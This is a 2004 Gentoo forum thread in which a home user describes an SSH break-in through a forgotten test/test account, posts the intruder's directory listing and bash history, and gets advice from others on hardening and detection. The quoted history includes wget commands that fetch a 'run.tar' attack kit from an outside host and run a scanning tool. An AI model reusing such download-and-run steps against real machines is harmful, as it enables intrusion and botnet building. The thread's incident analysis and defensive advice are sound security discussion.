i got hacked. what were they up to?

Message

bcore · Post by **bcore** » Sun Aug 15, 2004 6:44 pm

Ok, so I seem to have been hacked. I run a gentoo box as my home machine, but to be honest, I don't take nearly as good care of it as I should.. I'm sure I got what I deserved.

Here's what I found out. The other day, I noticed a failed SSH login on my little syslog scroller to the user named "test". I completely forgot that such a user existed, but thinking about it, I'm pretty sure that when I first installed gentoo on this machine 3 years ago, I made an account with the username AND password of "test", and I guess I forgot to delete it. Now you see why I say I got what I deserved. I decided that I should delete the account, and when I went to delete it's home directory, I noticed that a directory named "1", had been created. Inside that directory was a directory called "lib", and in the lib directory was a program I had never seen before. Here's the ls output:

Code: Select all

total 893
-rw-r--r--  1 1013 users 166154 Aug  7 02:10 Born2Kill.seen
-rw-------  1 1013 users  17982 Oct  9  2000 COPYING
-rw-r--r--  1 1013 users 122242 Aug  7 02:12 LinkEvents
-rw-------  1 1013 users   2147 Oct  9  2000 Makefile
-rw-------  1 1013 users   3398 Nov  8  2000 README
-rw-------  1 1013 users   1569 Oct  9  2000 TODO
-rw-------  1 1013 users  25722 Nov  8  2000 VERSIONS
-rwx------  1 1013 users    936 Dec 21  2003 checkmech
-rwx------  1 1013 users  20290 Oct  9  2000 configure
-rwx------  1 1013 users 474228 Sep 29  2001 crond
-rw-r--r--  1 1013 users    111 Aug  7 02:00 emech.users
-rw-r--r--  1 1013 users     76 May 27  2003 knopki.seen
-rw-------  1 1013 users  22935 Oct  9  2000 mech.help
-rw-r--r--  1 1013 users   1085 Aug  7 02:00 mech.levels
-rw-------  1 1013 users      6 Aug  3 19:49 mech.pid
-rw-r--r--  1 1013 users    484 Aug  7 02:00 mech.session
-rw-------  1 1013 users   4842 Jul 28 02:29 mech.set
-rw-r--r--  1 1013 users   4862 Jul 28 02:33 mech.setes
drwx------  2 1013 users    304 Nov  8  2000 randfiles
drwx------  2 1013 users   1184 Sep 29  2001 src

I opened the user's .bash_history, and here's what I found:

Code: Select all

w
ls
dir
cd\
hash
cd /bin/ls
ls
mkdir 1
ls
cd 1
passwd
passwd
passwd
ls
w
uname -a
cd /var
ls
cd mail
ls
test
./tets
./test
wget
cd
ls
rm -rf 1
ls
cd /sbin
ls
mkdir 1
wget
wget born2kill.100free.com/run.tar
cd
mkdir 1
cd 1
wget born2kill.100free.com/run.tar
ls
tar xzvf run.tar
tar xvf run.tar
ls
cd run
ls
./sc 168 32773 25 150
uptime

The creation date of the "1" and "lib" directory is august 3rd, so this happened recently. My question is whether anyone knows what this person was up to? The part I wonder in particular about is the line "./sc <a bunch of numbers>". I went to the URL where they downloaded the program, but it is no longer working. chkrootkit doesn't find anything.

I'm not too worried about having been hacked, as I was planning on replacing my hard drive within a week or two and starting fresh anyways. This time I'll be more careful, obviously.

mod edit: Sticky
amne
edit2: 2006-04-10 unstuck
amne

jjasghar · Post by **jjasghar** » Sun Aug 15, 2004 7:09 pm

that is interesting...

moral of that storie, don't have a username called "test"

bcore · Post by **bcore** » Sun Aug 15, 2004 7:35 pm

Hmm, more web searching seems to reveal that they were attempting (and failing) to install and run an IRC bot. Since I have never gotten into IRC, I have no idea what that is, although I've heard the term many times.

sirber · Post by **sirber** » Sun Aug 15, 2004 7:47 pm

You can surely get his IP and contact his ISP about hacking attempt.

tomchuk · Post by **tomchuk** » Sun Aug 15, 2004 8:21 pm

The source IP of the attack is just another compromised box, with either guest/guest, test/test, admin/admin, root/root username/password combos running sshd. I've been getting so many of these attempts that I've stopped reporting these compromised boxes. There have been a huge ammount of scans using this new tool since the end of July and there are probably tens of thousands of compromised boxes out there.

The attacker's usual course of events is to login from a compromised box, change the password, download this little "run.tar" kit maybe run an irc bot, and then set the scanning tool to scan an entire class A. Many time's he'll also run a trojaned sshd. He'll usually show up later to collect the results and/or use your box to infiltrate others. The scary part is that whoever is behind this hasn't done anything with these compromised boxen yet, they just seem to be cataloging the results of the scans.

brettlpb · Post by **brettlpb** » Sun Aug 15, 2004 10:10 pm

Sorry to de-rail, but what log are you scrolling to see failed ssh logins etc?

bcore · Post by **bcore** » Sun Aug 15, 2004 10:21 pm

/var/log/messages with some serious grep action.

Captain_Loser · Post by **Captain_Loser** » Mon Aug 16, 2004 1:12 am

Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.

Determined · Post by **Determined** » Mon Aug 16, 2004 5:18 am

Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.

The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.

bcore · Post by **bcore** » Mon Aug 16, 2004 5:24 am

Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it.

tumbak · Post by **tumbak** » Mon Aug 16, 2004 7:27 am

I noticed a directory called src/ in your output, can you tar it and share it please, or tar the whole ~test

JudgeNik · Post by **JudgeNik** » Mon Aug 16, 2004 7:30 am

damn.

I've seen a folder called /1/ on my server.

I've been told to emerge chkrootkit.
apparently i've been rooted...

Don't know how my server was setup beginning of last year and it never had any testing accounts on it and no accounts with same/same.

drspewfy · Post by **drspewfy** » Mon Aug 16, 2004 8:35 am

off course you have been routed,,!!!!

and he installed a Psybnc kinda bot, He uses YOUR ip to connect to the IRc and like that talk with others using your ip, if somebody tries to aatack him he wont get down cuz, hes spoofing your IP.. and you will get down

You should use

"lsof" instands of netstat , ps x, etc...

Cuz maybe you have been backdoored..
use the command "find" to see, What files had been modified in that day,
also try to use tripwire, to see what files changed since the intrusion (well that is for the nexts penetrations

, besides snort.

good luck!

bcore · Post by **bcore** » Mon Aug 16, 2004 11:44 am

I'm certainly willing to tar up the directory for anyone who is curious. I have no way of hosting it though...

evoweiss · Post by **evoweiss** » Mon Aug 16, 2004 11:53 am

Hi all,

Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root"). I keep everything up-to-date and, hence, haven't noticed anything amiss. Just a quick tip: There's no need to dig through the log file of everything, just look into the /var/log/sshd/ files to get an indication of that port's activity.

Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

Finally, I always use strong passwords and keep my system updated. I suspect I'm pretty safe

.

Best,

Alex

jpc82 · Post by **jpc82** » Mon Aug 16, 2004 2:07 pm

Wow I am glad I saw this post.

I was just looking at my logs and I see this

Code: Select all

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2

Does this mean that all thier attempts were not successful? I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root" I'm confused since I have ssh to not allow root access, or is this just the regular error for failed root access?

Also, would moving ssh to another post stop these attacks? I'm assuming it would since they would be trying to connect to the wrong port?

grant.mcdorman · Post by **grant.mcdorman** » Mon Aug 16, 2004 4:21 pm

bcore wrote:Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.

I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it.

I ssh in from work too, but I've set up the firewall so the ssh port is only open to my work IP - connection attempts from any other IP are dropped. If your work IP is a fixed address, and your firewall supports it (Linux of course does, and some router boxes, e.g. SMC's, do too), you could do this too to get better security. Makes it kinda hard for the 31337 sk1rpt kiddies to try to break in that way.

bcore · Post by **bcore** » Mon Aug 16, 2004 4:54 pm

Unfortunately I don't get a static IP from work, but I'm thinking I'm gonna set sshd up to only allow key logins, since I use keychain from work. I've already also got it set up do disallow root logins, so I figure I should be reasonably safe...

smonijhay1 · Post by **smonijhay1** » Mon Aug 16, 2004 4:58 pm

geez, what an awesome post!

thought I should give my info a look since I saw this post and sure enough there were numerous attempts at trying to connect using random user names.

now I must learn to set up and configure a good firewall (ipchains? iptables?)

bcore · Post by **bcore** » Mon Aug 16, 2004 5:07 pm

One other thing I have to remark is that looking at the bash_history really shows how inept this person was.. Total script kiddie. I mean cummon.. "cd\"??! The lame failed attempt to read my mail, then install something in "/sbin"?

I definitely don't think I was up against anyone with skill, so if I had been properly prepared I would have had nothning to worry about..

tomchuk · Post by **tomchuk** » Mon Aug 16, 2004 5:32 pm

bcore wrote:I definitely don't think I was up against anyone with skill.

Well he definately wasn't up against anyone with skill

Come on, three years with a test user with test as a password - you're in no place to critique anyone's typos

bcore · Post by **bcore** » Mon Aug 16, 2004 5:35 pm

Re-read my posts. I fully admitted that I made a mistake, and I said that if I had done my due diligence, I would have been fine.

tomchuk · Post by **tomchuk** » Mon Aug 16, 2004 5:40 pm

I know, it was a joke, notice the 'Razz' and 'Smile' smileys.

GentooBox · Post by **GentooBox** » Mon Aug 16, 2004 6:12 pm

I hate ssh worms...

They will never stop.. just like any other worm.

Ox53746F6E65 · Post by **Ox53746F6E65** » Mon Aug 16, 2004 6:13 pm

use portknocking to make your system more secure.